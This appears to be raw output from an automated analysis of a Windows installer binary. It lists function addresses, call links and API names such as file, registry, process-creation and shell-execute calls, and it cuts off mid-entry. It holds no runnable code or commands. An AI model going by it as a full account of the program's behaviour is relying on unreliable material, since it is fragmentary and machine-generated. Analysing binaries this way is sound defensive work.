4048->4050 4076 4044f8 KiUserCallbackDispatcher 4049->4076 4050->4049 4052 4042cf EnableWindow 4057 4042e3 4052->4057 4053 4042e8 GetSystemMenu EnableMenuItem SendMessageW 4054 404318 SendMessageW 4053->4054 4053->4057 4054->4057 4056 403fb8 22 API calls 4056->4057 4057->4053 4057->4056 4077 40450b SendMessageW 4057->4077 4078 406557 lstrcpynW 4057->4078 4059 404347 lstrlenW 4060 406594 21 API calls 4059->4060 4061 40435d SetWindowTextW 4060->4061 4062 401389 2 API calls 4061->4062 4062->4031 4064 4043bb CreateDialogParamW 4063->4064 4063->4072 4065 4043ee 4064->4065 4064->4072 4066 4044d6 22 API calls 4065->4066 4067 4043f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4066->4067 4068 401389 2 API calls 4067->4068 4069 40443f 4068->4069 4069->4025 4070 404447 ShowWindow 4069->4070 4071 404522 SendMessageW 4070->4071 4071->4072 4072->4025 4072->4030 4074 406594 21 API calls 4073->4074 4075 4044e1 SetDlgItemTextW 4074->4075 4075->4048 4076->4052 4077->4057 4078->4059 4080 4044b6 4079->4080 4081 4044bc SendMessageW 4079->4081 4080->4081 4081->4042 4083 404555 GetWindowLongW 4082->4083 4093 404600 4082->4093 4084 40456a 4083->4084 4083->4093 4085 404597 GetSysColor 4084->4085 4086 40459a 4084->4086 4084->4093 4085->4086 4087 4045a0 SetTextColor 4086->4087 4088 4045aa SetBkMode 4086->4088 4087->4088 4089 4045c2 GetSysColor 4088->4089 4090 4045c8 4088->4090 4089->4090 4091 4045d9 4090->4091 4092 4045cf SetBkColor 4090->4092 4091->4093 4094 4045f3 CreateBrushIndirect 4091->4094 4095 4045ec DeleteObject 4091->4095 4092->4091 4093->4025 4094->4093 4095->4094 4459 4014d7 4460 402d89 21 API calls 4459->4460 4461 4014dd Sleep 4460->4461 4463 402c2f 4461->4463 4464 40195b 4465 402dab 21 API calls 4464->4465 4466 401962 lstrlenW 4465->4466 4467 40263d 4466->4467 4181 4020dd 4182 4020ef 4181->4182 4192 4021a1 4181->4192 4183 402dab 21 API calls 4182->4183 4184 4020f6 4183->4184 4186 402dab 21 API calls 4184->4186 4185 401423 28 API calls 4190 4022fb 4185->4190 4187 4020ff 4186->4187 4188 402115 LoadLibraryExW 4187->4188 4189 402107 GetModuleHandleW 4187->4189 4191 402126 4188->4191 4188->4192 4189->4188 4189->4191 4201 4069ba 4191->4201 4192->4185 4195 402170 4197 4055dc 28 API calls 4195->4197 4196 402137 4198 401423 28 API calls 4196->4198 4199 402147 4196->4199 4197->4199 4198->4199 4199->4190 4200 402193 FreeLibrary 4199->4200 4200->4190 4206 406579 WideCharToMultiByte 4201->4206 4203 4069d7 4204 402131 4203->4204 4205 4069de GetProcAddress 4203->4205 4204->4195 4204->4196 4205->4204 4206->4203 4468 402b5e 4469 402bb0 4468->4469 4470 402b65 4468->4470 4471 40694b 5 API calls 4469->4471 4472 402d89 21 API calls 4470->4472 4475 402bae 4470->4475 4473 402bb7 4471->4473 4474 402b73 4472->4474 4476 402dab 21 API calls 4473->4476 4478 402d89 21 API calls 4474->4478 4477 402bc0 4476->4477 4477->4475 4479 402bc4 IIDFromString 4477->4479 4481 402b7f 4478->4481 4479->4475 4480 402bd3 4479->4480 4480->4475 4486 406557 lstrcpynW 4480->4486 4485 40649e wsprintfW 4481->4485 4483 402bf0 CoTaskMemFree 4483->4475 4485->4475 4486->4483 3184 401761 3190 402dab 3184->3190 3188 40176f 3189 406076 2 API calls 3188->3189 3189->3188 3191 402db7 3190->3191 3200 406594 3191->3200 3194 401768 3196 406076 3194->3196 3197 406083 GetTickCount GetTempFileNameW 3196->3197 3198 4060bd 3197->3198 3199 4060b9 3197->3199 3198->3188 3199->3197 3199->3198 3205 40659f 3200->3205 3201 4067e6 3202 402dd8 3201->3202 3239 406557 lstrcpynW 3201->3239 3202->3194 3217 406805 3202->3217 3204 4067b7 lstrlenW 3204->3205 3205->3201 3205->3204 3206 4066b0 GetSystemDirectoryW 3205->3206 3207 406594 15 API calls 3205->3207 3211 4066c6 GetWindowsDirectoryW 3205->3211 3212 406594 15 API calls 3205->3212 3213 406758 lstrcatW 3205->3213 3214 406805 5 API calls 3205->3214 3216 406728 SHGetPathFromIDListW CoTaskMemFree 3205->3216 3226 406425 3205->3226 3231 40694b GetModuleHandleA 3205->3231 3237 40649e wsprintfW 3205->3237 3238 406557 lstrcpynW 3205->3238 3206->3205 3207->3204 3211->3205 3212->3205 3213->3205 3214->3205 3216->3205 3224 406812 3217->3224 3218 406888 3219 40688d CharPrevW 3218->3219 3221 4068ae 3218->3221 3219->3218 3220 40687b CharNextW 3220->3218 3220->3224 3221->3194 3223 406867 CharNextW 3223->3224 3224->3218 3224->3220 3224->3223 3225 406876 CharNextW 3224->3225 3247 405e53 3224->3247 3225->3220 3240 4063c4 3226->3240 3229 406489 3229->3205 3230 406459 RegQueryValueExW RegCloseKey 3230->3229 3232 406971 GetProcAddress 3231->3232 3233 406967 3231->3233 3234 406980 3232->3234 3244 4068db GetSystemDirectoryW 3233->3244 3234->3205 3236 40696d 3236->3232 3236->3234 3237->3205 3238->3205 3239->3202 3241 4063d3 3240->3241 3242 4063d7 3241->3242 3243 4063dc RegOpenKeyExW 3241->3243 3242->3229 3242->3230 3243->3242 3246 4068fd wsprintfW LoadLibraryExW 3244->3246 3246->3236 3248 405e59 3247->3248 3249 405e6f 3248->3249 3250 405e60 CharNextW 3248->3250 3249->3224 3250->3248 4487 401d62 4488 402d89 21 API calls 4487->4488 4489 401d73 SetWindowLongW 4488->4489 4490 402c2f 4489->4490 4491 4028e3 4492 4028eb 4491->4492 4493 4028ef FindNextFileW 4492->4493 4495 402901 4492->4495 4494 402948 4493->4494 4493->4495 4497 406557 lstrcpynW 4494->4497 4497->4495 4498 403be7 4499 403bf2 4498->4499 4500 403bf6 4499->4500 4501 403bf9 GlobalAlloc 4499->4501 4501->4500 4502 401568 4503 402ba9 4502->4503 4506 40649e wsprintfW 4503->4506 4505 402bae 4506->4505 3487 73a91000 3490 73a91096 3487->3490 3567 73a91987 GetCurrentProcess GetModuleHandleA GetProcAddress 3490->3567 3493 73a910e8 GetModuleFileNameW GlobalAlloc 3495 73a9112f 3493->3495 3494 73a9122d GlobalAlloc 3496 73a91247 3494->3496 3497 73a9114f 3495->3497 3498 73a91135 CharPrevW 3495->3498 3499 73a9125f FindWindowExW FindWindowExW 3496->3499 3511 73a9127e 3496->3511 3500 73a91159 3497->3500 3501 73a9116f GetTempFileNameW CopyFileW 3497->3501 3498->3495 3498->3497 3499->3511 3583 73a91c8c 3500->3583 3504 73a9120b lstrcatW lstrlenW 3501->3504 3505 73a911a2 CreateFileW CreateFileMappingW MapViewOfFile 3501->3505 3504->3496 3507 73a911fd CloseHandle CloseHandle 3505->3507 3508 73a911d7 UnmapViewOfFile 3505->3508 3507->3504 3508->3507 3510 73a9102b 3512 73a912aa lstrcmpiW 3511->3512 3572 73a91c4c 3511->3572 3577 73a91a61 lstrlenW lstrlenW 3511->3577 3512->3511 3513 73a912bf lstrcmpiW 3512->3513 3513->3511 3514 73a912d7 3513->3514 3515 73a91308 GetVersion 3514->3515 3516 73a912dc 3514->3516 3517 73a91390 GlobalAlloc 3515->3517 3518 73a913c7 3515->3518 3519 73a91c8c 2 API calls 3516->3519 3525 73a91484 lstrcpyW 3517->3525 3531 73a913c4 3517->3531 3522 73a913fe CreatePipe 3518->3522 3523 73a913d5 InitializeSecurityDescriptor SetSecurityDescriptorDacl 3518->3523 3520 73a912e6 3519->3520 3529 73a91300 3520->3529 3530 73a912f7 DeleteFileW 3520->3530 3522->3525 3526 73a91417 CreatePipe 3522->3526 3523->3522 3528 73a9175f 3525->3528 3526->3525 3527 73a9142a GetStartupInfoW CreateProcessW 3526->3527 3527->3525 3532 73a9149b GetTickCount 3527->3532 3533 73a9176f 3528->3533 3534 73a91767 3528->3534 3529->3515 3530->3529 3531->3518 3535 73a914a4 WaitForSingleObject GetExitCodeProcess 3532->3535 3537 73a91787 3533->3537 3541 73a9177c 3533->3541 3536 73a91c8c 2 API calls 3534->3536 3540 73a914c4 PeekNamedPipe 3535->3540 3536->3533 3538 73a91790 lstrcpyW 3537->3538 3539 73a917a2 3537->3539 3538->3539 3542 73a917ab wsprintfW 3539->3542 3543 73a917c3 3539->3543 3544 73a9170a 3540->3544 3545 73a914de GetTickCount ReadFile 3540->3545 3546 73a91a01 3 API calls 3541->3546 3542->3543 3548 73a91c8c 2 API calls 3543->3548 3544->3528 3549 73a9174a Sleep 3544->3549 3550 73a91716 GetTickCount 3544->3550 3559 73a91520 3545->3559 3547 73a91785 3546->3547 3547->3537 3551 73a917cf 6 API calls 3548->3551 3549->3535 3550->3549 3553 73a91725 TerminateProcess lstrcpyW 3550->3553 3554 73a917fe 3551->3554 3552 73a91524 IsTextUnicode 3552->3559 3553->3535 3555 73a91810 GlobalFree 3554->3555 3556 73a91807 DeleteFileW 3554->3556 3555->3510 3557 73a91820 GlobalFree 3555->3557 3556->3555 3557->3510 3558 73a91597 IsDBCSLeadByteEx 3558->3559 3560 73a915b6 MultiByteToWideChar 3558->3560 3559->3535 3559->3540 3559->3552 3559->3558 3559->3560 3561 73a915ec lstrcpyW 3559->3561 3562 73a91672 GlobalReAlloc 3559->3562 3586 73a91a01 3559->3586 3589 73a9182a 3559->3589 3593 73a91948 3559->3593 3560->3559 3561->3559 3562->3559 3564 73a916ec lstrcpyW 3562->3564 3564->3535 3568 73a919dd GetProcAddress 3567->3568 3569 73a919c3 3567->3569 3570 73a910e0 3568->3570 3571 73a919ec 3568->3571 3569->3568 3569->3570 3570->3493 3570->3494 3571->3570 3573 73a91c85 3572->3573 3574 73a91c56 3572->3574 3573->3511 3574->3573 3575 73a91c63 lstrcpyW 3574->3575 3576 73a91c76 GlobalFree 3574->3576 3575->3576 3576->3573 3578 73a91abc 3577->3578 3579 73a91a82 3577->3579 3578->3511 3580 73a91a8d lstrcmpiW 3579->3580 3596 73a918cc 3579->3596 3580->3578 3580->3579 3584 73a91163 GlobalFree 3583->3584 3585 73a91c95 GlobalAlloc lstrcpynW 3583->3585 3584->3510 3585->3584 3587 73a91a5e 3586->3587 3588 73a91a13 SendMessageW SendMessageW SendMessageW 3586->3588 3587->3559 3588->3587 3590 73a91837 3589->3590 3591 73a9189d 3589->3591 3590->3591 3592 73a918cc CharNextW 3590->3592 3591->3559 3592->3590 3594 73a91953 CharNextExA 3593->3594 3595 73a91981 3593->3595 3594->3595 3595->3559 3597 73a918de 3596->3597 3598 73a918da lstrlenW 3596->3598 3597->3598 3599 73a91925 CharNextW 3597->3599 3598->3578 3598->3579 3599->3598 4507 40196d 4508 402d89 21 API calls 4507->4508 4509 401974 4508->4509 4510 402d89 21 API calls 4509->4510 4511 401981 4510->4511 4512 402dab 21 API calls 4511->4512 4513 401998 lstrlenW 4512->4513 4514 4019a9 4513->4514 4515 4019ea 4514->4515 4519 406557 lstrcpynW 4514->4519 4517 4019da 4517->4515 4518 4019df lstrlenW 4517->4518 4518->4515 4519->4517 4520 40166f 4521 402dab 21 API calls 4520->4521 4522 401675 4521->4522 4523 4068b4 2 API calls 4522->4523 4524 40167b 4523->4524 4525 402af0 4526 402d89 21 API calls 4525->4526 4528 402af6 4526->4528 4527 402933 4528->4527 4529 406594 21 API calls 4528->4529 4529->4527 4530 4026f1 4531 402d89 21 API calls 4530->4531 4532 402700 4531->4532 4533 40274a ReadFile 4532->4533 4534 4060ca ReadFile 4532->4534 4535 406128 5 API calls 4532->4535 4536 40278a MultiByteToWideChar 4532->4536 4537 40283f 4532->4537 4539 4027b0 SetFilePointer MultiByteToWideChar 4532->4539 4540 402850 4532->4540 4542 40283d 4532->4542 4533->4532 4533->4542 4534->4532 4535->4532 4536->4532 4543 40649e wsprintfW 4537->4543 4539->4532 4541 402871 SetFilePointer 4540->4541 4540->4542 4541->4542 4543->4542 3959 401774 3960 402dab 21 API calls 3959->3960 3961 40177b 3960->3961 3962 4017a3 3961->3962 3963 40179b 3961->3963 3999 406557 lstrcpynW 3962->3999 3998 406557 lstrcpynW 3963->3998 3966 4017a1 3970 406805 5 API calls 3966->3970 3967 4017ae 3968 405e26 3 API calls 3967->3968 3969 4017b4 lstrcatW 3968->3969 3969->3966 3974 4017c0 3970->3974 3971 4068b4 2 API calls 3971->3974 3972 406022 2 API calls 3972->3974 3974->3971 3974->3972 3975 4017d2 CompareFileTime 3974->3975 3976 401892 3974->3976 3984 406594 21 API calls 3974->3984 3989 406557 lstrcpynW 3974->3989 3992 405bb7 MessageBoxIndirectW 3974->3992 3995 401869 3974->3995 3997 406047 GetFileAttributesW CreateFileW 3974->3997 3975->3974 3977 4055dc 28 API calls 3976->3977 3979 40189c 3977->3979 3978 4055dc 28 API calls 3986 40187e 3978->3986 3980 4032b9 35 API calls 3979->3980 3981 4018af 3980->3981 3982 4018c3 SetFileTime 3981->3982 3983 4018d5 CloseHandle 3981->3983 3982->3983 3985 4018e6 3983->3985 3983->3986 3984->3974 3987 4018eb 3985->3987 3988 4018fe 3985->3988 3990 406594 21 API calls 3987->3990 3991 406594 21 API calls 3988->3991 3989->3974 3993 4018f3 lstrcatW 3990->3993 3994 401906 3991->3994 3992->3974 3993->3994 3996 405bb7 MessageBoxIndirectW 3994->3996 3995->3978 3995->3986 3996->3986 3997->3974 3998->3966 3999->3967 4544 4014f5 SetForegroundWindow 4545 402c2f 4544->4545 4546 401a77 4547 402d89 21 API calls 4546->4547 4548 401a80 4547->4548 4549 402d89 21 API calls 4548->4549 4550 401a25 4549->4550 4551 401578 4552 401591 4551->4552 4553 401588 ShowWindow 4551->4553 4554 402c2f 4552->4554 4555 40159f ShowWindow 4552->4555 4553->4552 4555->4554 4556 4023f9 4557 402dab 21 API calls 4556->4557 4558 402408 4557->4558 4559 402dab 21 API calls 4558->4559 4560 402411 4559->4560 4561 402dab 21 API calls 4560->4561 4562 40241b GetPrivateProfileStringW 4561->4562 4563 401ffb 4564 402dab 21 API calls 4563->4564 4565 402002 4564->4565 4566 4068b4 2 API calls 4565->4566 4567 402008 4566->4567 4569 402019 4567->4569 4570 40649e wsprintfW 4567->4570 4570->4569 4571 401b7c 4572 402dab 21 API calls 4571->4572 4573 401b83 4572->4573 4574 402d89 21 API calls 4573->4574 4575 401b8c wsprintfW 4574->4575 4576 402c2f 4575->4576 4207 405b7d ShellExecuteExW 4577 401000 4578 401037 BeginPaint GetClientRect 4577->4578 4579 40100c DefWindowProcW 4577->4579 4581 4010f3 4578->4581 4582 401179 4579->4582 4583 401073 CreateBrushIndirect FillRect DeleteObject 4581->4583 4584 4010fc 4581->4584 4583->4581 4585 401102 CreateFontIndirectW 4584->4585 4586 401167 EndPaint 4584->4586 4585->4586 4587 401112 6 API calls 4585->4587 4586->4582 4587->4586 4588 404980 4589 404990 4588->4589 4590 4049b6 4588->4590 4591 4044d6 22 API calls 4589->4591 4592 40453d 8 API calls 4590->4592 4593 40499d SetDlgItemTextW 4591->4593 4594 4049c2 4592->4594 4593->4590 4595 401680 4596 402dab 21 API calls 4595->4596 4597 401687 4596->4597 4598 402dab 21 API calls 4597->4598 4599 401690 4598->4599 4600 402dab 21 API calls 4599->4600 4601 401699 MoveFileW 4600->4601 4602 4016a5 4601->4602 4603 4016ac 4601->4603 4605 401423 28 API calls 4602->4605 4604 4068b4 2 API calls 4603->4604 4607 4022fb 4603->4607 4606 4016bb 4604->4606 4605->4607 4606->4607 4608 406317 40 API calls 4606->4608 4608->4602 4609 401503 4610 401508 4609->4610 4612 401520 4609->4612 4611 402d89 21 API calls 4610->4611 4611->4612 3271 402304 3272 402dab 21 API calls 3271->3272 3273 40230a 3272->3273 3274 402dab 21 API calls 3273->3274 3275 402313 3274->3275 3276 402dab 21 API calls 3275->3276 3277 40231c 3276->3277 3286 4068b4 FindFirstFileW 3277->3286 3280 402336 lstrlenW lstrlenW 3283 4055dc 28 API calls 3280->3283 3281 402329 3285 402331 3281->3285 3289 4055dc 3281->3289 3284 402374 SHFileOperationW 3283->3284 3284->3281 3284->3285 3287 402325 3286->3287 3288 4068ca FindClose 3286->3288 3287->3280 3287->3281 3288->3287 3290 4055f7 3289->3290 3299 405699 3289->3299 3291 405613 lstrlenW 3290->3291 3292 406594 21 API calls 3290->3292 3293 405621 lstrlenW 3291->3293 3294 40563c 3291->3294 3292->3291 3295 405633 lstrcatW 3293->3295 3293->3299 3296 405642 SetWindowTextW 3294->3296 3297 40564f 3294->3297 3295->3294 3296->3297 3298 405655 SendMessageW SendMessageW SendMessageW 3297->3298 3297->3299 3298->3299 3299->3285 4613 401a04 4614 402dab 21 API calls 4613->4614 4615 401a0b 4614->4615 4616 402dab 21 API calls 4615->4616 4617 401a14 4616->4617 4618 401a1b lstrcmpiW 4617->4618 4619 401a2d lstrcmpW 4617->4619 4620 401a21 4618->4620 4619->4620 4621 401d86 4622 401d99 GetDlgItem 4621->4622 4623 401d8c 4621->4623 4625 401d93 4622->4625 4624 402d89 21 API calls 4623->4624 4624->4625 4626 401dda GetClientRect LoadImageW SendMessageW 4625->4626 4627 402dab 21 API calls 4625->4627 4629 401e44 4626->4629 4630 401e38 4626->4630 4627->4626 4630->4629 4631 401e3d DeleteObject 4630->4631 4631->4629 4632 402388 4633 40238f 4632->4633 4636 4023a2 4632->4636 4634 406594 21 API calls 4633->4634 4635 40239c 4634->4635 4637 405bb7 MessageBoxIndirectW 4635->4637 4637->4636 4638 402c0a SendMessageW 4639 402c24 InvalidateRect 4638->4639 4640 402c2f 4638->4640 4639->4640 4641 40460c lstrcpynW lstrlenW 4642 73a91b67 GetCommandLineW lstrcpynW 4644 73a91bba 4642->4644 4643 73a91bd9 4645 73a918cc CharNextW 4643->4645 4644->4643 4646 73a918cc CharNextW 4644->4646 4647 73a91bdf CreateProcessW 4645->4647 4646->4644 4649 73a91c41 ExitProcess 4647->4649 4650 73a91c10 WaitForSingleObject GetExitCodeProcess CloseHandle CloseHandle ExitProcess 4647->4650 3631 40248f 3632 402dab 21 API calls 3631->3632 3633 4024a1 3632->3633 3634 402dab 21 API calls 3633->3634 3635 4024ab 3634->3635 3648 402e3b 3635->3648 3638 402933 3639 4024e3 3641 4024ef 3639->3641 3644 402d89 21 API calls 3639->3644 3640 402dab 21 API calls 3643 4024d9 lstrlenW 3640->3643 3642 40250e RegSetValueExW 3641->3642 3652 4032b9 3641->3652 3646 402524 RegCloseKey 3642->3646 3643->3639 3644->3641 3646->3638 3649 402e56 3648->3649 3672 4063f2 3649->3672 3654 4032d2 3652->3654 3653 403300 3676 4034d4 3653->3676 3654->3653 3679 4034ea SetFilePointer 3654->3679 3658 40346d 3660 4034af 3658->3660 3665 403471 3658->3665 3659 40331d GetTickCount 3661 403457 3659->3661 3668 40336c 3659->3668 3662 4034d4 ReadFile 3660->3662 3661->3642 3662->3661 3663 4034d4 ReadFile 3663->3668 3664 4034d4 ReadFile 3664->3665 3665->3661 3665->3664 3666 4060f9 WriteFile 3665->3666 3666->3665 3667 4033c2 GetTickCount 3667->3668 3668->3661 3668->3663 3668->3667 3669 4033e7 MulDiv wsprintfW 3668->3669 3671 4060f9 WriteFile 3668->3671 3670 4055dc 28 API calls 3669->3670 3670->3668 3671->3668 3673 406401 3672->3673 3674 4024bb 3673->3674 3675 40640c RegCreateKeyExW 3673->3675 3674->3638 3674->3639 3674->3640 3675->3674 3677 4060ca ReadFile 3676->3677 3678 40330b 3677->3678 3678->3658 3678->3659 3678->3661 3679->3653 3698 402910 3699 402dab 21 API calls 3698->3699 3700 402917 FindFirstFileW 3699->3700 3701 40293f 3700->3701 3705 40292a 3700->3705 3706 40649e wsprintfW 3701->3706 3703 402948 3707 406557 lstrcpynW 3703->3707 3706->3703 3707->3705 4651 401911 4652 401948 4651->4652 4653 402dab 21 API calls 4652->4653 4654 40194d 4653->4654 4655 405c63 71 API calls 4654->4655 4656 401956 4655->4656 4657 401491 4658 4055dc 28 API calls 4657->4658 4659 401498 4658->4659 4660 401914 4661 402dab 21 API calls 4660->4661 4662 40191b 4661->4662 4663 405bb7 MessageBoxIndirectW 4662->4663 4664 401924 4663->4664 4665 404695 4666 4046ad 4665->4666 4670 4047c7 4665->4670 4671 4044d6 22 API calls 4666->4671 4667 404831 4668 4048fb 4667->4668 4669 40483b GetDlgItem 4667->4669 4676 40453d 8 API calls 4668->4676 4672 404855 4669->4672 4673 4048bc 4669->4673 4670->4667 4670->4668 4674 404802 GetDlgItem SendMessageW 4670->4674 4675 404714 4671->4675 4672->4673 4678 40487b SendMessageW LoadCursorW SetCursor 4672->4678 4673->4668 4679 4048ce 4673->4679 4698 4044f8 KiUserCallbackDispatcher 4674->4698 4681 4044d6 22 API calls 4675->4681 4677 4048f6 4676->4677 4699 404944 4678->4699 4683 4048e4 4679->4683 4684 4048d4 SendMessageW 4679->4684 4686 404721 CheckDlgButton 4681->4686 4683->4677 4688 4048ea SendMessageW 4683->4688 4684->4683 4685 40482c 4689 404920 SendMessageW 4685->4689 4696 4044f8 KiUserCallbackDispatcher 4686->4696 4688->4677 4689->4667 4691 40473f GetDlgItem 4697 40450b SendMessageW 4691->4697 4693 404755 SendMessageW 4694 404772 GetSysColor 4693->4694 4695 40477b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4693->4695 4694->4695 4695->4677 4696->4691 4697->4693 4698->4685 4702 405b7d ShellExecuteExW 4699->4702 4701 4048aa LoadCursorW SetCursor 4701->4673 4702->4701 4703 402896 4704 40289d 4703->4704 4707 402bae 4703->4707 4705 402d89 21 API calls 4704->4705 4706 4028a4 4705->4706 4708 4028b3 SetFilePointer 4706->4708 4708->4707 4709 4028c3 4708->4709 4711 40649e wsprintfW 4709->4711 4711->4707 4712 401f17 4713 402dab 21 API calls 4712->4713 4714 401f1d 4713->4714 4715 402dab 21 API calls 4714->4715 4716 401f26 4715->4716 4717 402dab 21 API calls 4716->4717 4718 401f2f 4717->4718 4719 402dab 21 API calls 4718->4719 4720 401f38 4719->4720 4721 401423 28 API calls 4720->4721 4722 401f3f 4721->4722 4729 405b7d ShellExecuteExW 4722->4729 4724 401f87 4725 4069f6 5 API calls 4724->4725 4727 402933 4724->4727 4726 401fa4 CloseHandle 4725->4726 4726->4727 4729->4724 4730 402f98 4731 402fc3 4730->4731 4732 402faa SetTimer 4730->4732 4733 403018 4731->4733 4734 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4731->4734 4732->4731 4734->4733 4131 40571b 4132 4058c5 4131->4132 4133 40573c GetDlgItem GetDlgItem GetDlgItem 4131->4133 4134 4058f6 4132->4134 4135 4058ce GetDlgItem CreateThread CloseHandle 4132->4135 4177 40450b SendMessageW 4133->4177 4137 405921 4134->4137 4139 405946 4134->4139 4140 40590d ShowWindow ShowWindow 4134->4140 4135->4134 4180 4056af 5 API calls 4135->4180 4141 40592d 4137->4141 4143 405981 4137->4143 4138 4057ac 4142 4057b3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4138->4142 4147 40453d 8 API calls 4139->4147 4179 40450b SendMessageW 4140->4179 4145 405935 4141->4145 4146 40595b ShowWindow 4141->4146 4148 405821 4142->4148 4149 405805 SendMessageW SendMessageW 4142->4149 4143->4139 4150 40598f SendMessageW 4143->4150 4151 4044af SendMessageW 4145->4151 4153 40597b 4146->4153 4154 40596d 4146->4154 4152 405954 4147->4152 4156 405834 4148->4156 4157 405826 SendMessageW 4148->4157 4149->4148 4150->4152 4158 4059a8 CreatePopupMenu 4150->4158 4151->4139 4155 4044af SendMessageW 4153->4155 4159 4055dc 28 API calls 4154->4159 4155->4143 4161 4044d6 22 API calls 4156->4161 4157->4156 4160 406594 21 API calls 4158->4160 4159->4153 4162 4059b8 AppendMenuW 4160->4162 4163 405844 4161->4163 4164 4059d5 GetWindowRect 4162->4164 4165 4059e8 TrackPopupMenu 4162->4165 4166 405881 GetDlgItem SendMessageW 4163->4166 4167 40584d ShowWindow 4163->4167 4164->4165 4165->4152 4168 405a03 4165->4168 4166->4152 4170 4058a8 SendMessageW SendMessageW 4166->4170 4169 405863 ShowWindow 4167->4169 4172 405870 4167->4172 4171 405a1f SendMessageW 4168->4171 4169->4172 4170->4152 4171->4171 4173 405a3c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4171->4173 4178 40450b SendMessageW 4172->4178 4175 405a61 SendMessageW 4173->4175 4175->4175 4176 405a8a GlobalUnlock SetClipboardData CloseClipboard 4175->4176 4176->4152 4177->4138 4178->4166 4179->4137 4735 401d1c 4736 402d89 21 API calls 4735->4736 4737 401d22 IsWindow 4736->4737 4738 401a25 4737->4738 4739 404d1d 4740 404d49 4739->4740 4741 404d2d 4739->4741 4743 404d7c 4740->4743 4744 404d4f SHGetPathFromIDListW 4740->4744 4750 405b9b GetDlgItemTextW 4741->4750 4746 404d66 SendMessageW 4744->4746 4747 404d5f 4744->4747 4745 404d3a SendMessageW 4745->4740 4746->4743 4748 40140b 2 API calls 4747->4748 4748->4746 4750->4745 4751 40149e 4752 4023a2 4751->4752 4753 4014ac PostQuitMessage 4751->4753 4753->4752 4754 401ba0 4755 401bf1 4754->4755 4756 401bad 4754->4756 4757 401bf6 4755->4757 4758 401c1b GlobalAlloc 4755->4758 4759 401c36 4756->4759 4764 401bc4 4756->4764 4769 4023a2 4757->4769 4775 406557 lstrcpynW 4757->4775 4760 406594 21 API calls 4758->4760 4761 406594 21 API calls 4759->4761 4759->4769 4760->4759 4762 40239c 4761->4762 4768 405bb7 MessageBoxIndirectW 4762->4768 4773 406557 lstrcpynW 4764->4773 4765 401c08 GlobalFree 4765->4769 4767 401bd3 4774 406557 lstrcpynW 4767->4774 4768->4769 4771 401be2 4776 406557 lstrcpynW 4771->4776 4773->4767 4774->4771 4775->4765 4776->4769 4777 402621 4778 402dab 21 API calls 4777->4778 4779 402628 4778->4779 4782 406047 GetFileAttributesW CreateFileW 4779->4782 4781 402634 4782->4781 3251 4025a3 3263 402deb 3251->3263 3255 4025b6 3256 4025c5 3255->3256 3261 402933 3255->3261 3257 4025d2 RegEnumKeyW 3256->3257 3258 4025de RegEnumValueW 3256->3258 3259 4025fa RegCloseKey 3257->3259 3258->3259 3260 4025f3 3258->3260 3259->3261 3260->3259 3264 402dab 21 API calls 3263->3264 3265 402e02 3264->3265 3266 4063c4 RegOpenKeyExW 3265->3266 3267 4025ad 3266->3267 3268 402d89 3267->3268 3269 406594 21 API calls 3268->3269 3270 402d9e 3269->3270 3270->3255 3483 4015a8 3484 402dab 21 API calls 3483->3484 3485 4015af SetFileAttributesW 3484->3485 3486 4015c1 3485->3486 3600 401fa9 3601 402dab 21 API calls 3600->3601 3602 401faf 3601->3602 3603 4055dc 28 API calls 3602->3603 3604 401fb9 3603->3604 3615 405b3a CreateProcessW 3604->3615 3607 401fe2 CloseHandle 3611 402933 3607->3611 3610 401fd4 3612 401fe4 3610->3612 3613 401fd9 3610->3613 3612->3607 3623 40649e wsprintfW 3613->3623 3616 401fbf 3615->3616 3617 405b6d CloseHandle 3615->3617 3616->3607 3616->3611 3618 4069f6 WaitForSingleObject 3616->3618 3617->3616 3619 406a10 3618->3619 3620 406a22 GetExitCodeProcess 3619->3620 3624 406987 3619->3624 3620->3610 3623->3607 3625 4069a4 PeekMessageW 3624->3625 3626 4069b4 WaitForSingleObject 3625->3626 3627 40699a DispatchMessageW 3625->3627 3626->3619 3627->3625 3680 40202f 3681 402dab 21 API calls 3680->3681 3682 402036 3681->3682 3683 40694b 5 API calls 3682->3683 3684 402045 GetFileVersionInfoSizeW 3683->3684 3685 402061 GlobalAlloc 3684->3685 3687 402c2f 3684->3687 3686 402075 3685->3686 3685->3687 3688 40694b 5 API calls 3686->3688 3689 40207c 3688->3689 3690 40694b 5 API calls 3689->3690 3692 402086 3690->3692 3691 4020d1 3691->3687 3692->3691 3696 40649e wsprintfW 3692->3696 3694 4020bf 3697 40649e wsprintfW 3694->3697 3696->3694 3697->3691 4783 40252f 4784 402deb 21 API calls 4783->4784 4785 402539 4784->4785 4786 402dab 21 API calls 4785->4786 4787 402542 4786->4787 4788 402933 4787->4788 4789 40254d RegQueryValueExW 4787->4789 4790 40256d 4789->4790 4793 402573 RegCloseKey 4789->4793 4790->4793 4794 40649e wsprintfW 4790->4794 4793->4788 4794->4793 4795 4021af 4796 402dab 21 API calls 4795->4796 4797 4021b6 4796->4797 4798 402dab 21 API calls 4797->4798 4799 4021c0 4798->4799 4800 402dab 21 API calls 4799->4800 4801 4021ca 4800->4801 4802 402dab 21 API calls 4801->4802 4803 4021d4 4802->4803 4804 402dab 21 API calls 4803->4804 4805 4021de 4804->4805 4806 40221d CoCreateInstance 4805->4806 4807 402dab 21 API calls 4805->4807 4810 40223c 4806->4810 4807->4806 4808 401423 28 API calls 4809 4022fb 4808->4809 4810->4808 4810->4809 3708 403532 SetErrorMode GetVersionExW 3709 403586 GetVersionExW 3708->3709 3710 4035be 3708->3710 3709->3710 3711 403615 3710->3711 3712 40694b 5 API calls 3710->3712 3713 4068db 3 API calls 3711->3713 3712->3711 3714 40362b lstrlenA 3713->3714 3714->3711 3715 40363b 3714->3715 3716 40694b 5 API calls 3715->3716 3717 403642 3716->3717 3718 40694b 5 API calls 3717->3718 3719 403649 3718->3719 3720 40694b 5 API calls 3719->3720 3721 403655 #17 OleInitialize SHGetFileInfoW 3720->3721 3796 406557 lstrcpynW 3721->3796 3724 4036a4 GetCommandLineW 3797 406557 lstrcpynW 3724->3797 3726 4036b6 3727 405e53 CharNextW 3726->3727 3728 4036dc CharNextW 3727->3728 3736 4036ee 3728->3736 3729 4037f0 3730 403804 GetTempPathW 3729->3730 3798 403501 3730->3798 3732 40381c 3733 403820 GetWindowsDirectoryW lstrcatW 3732->3733 3734 403876 DeleteFileW 3732->3734 3737 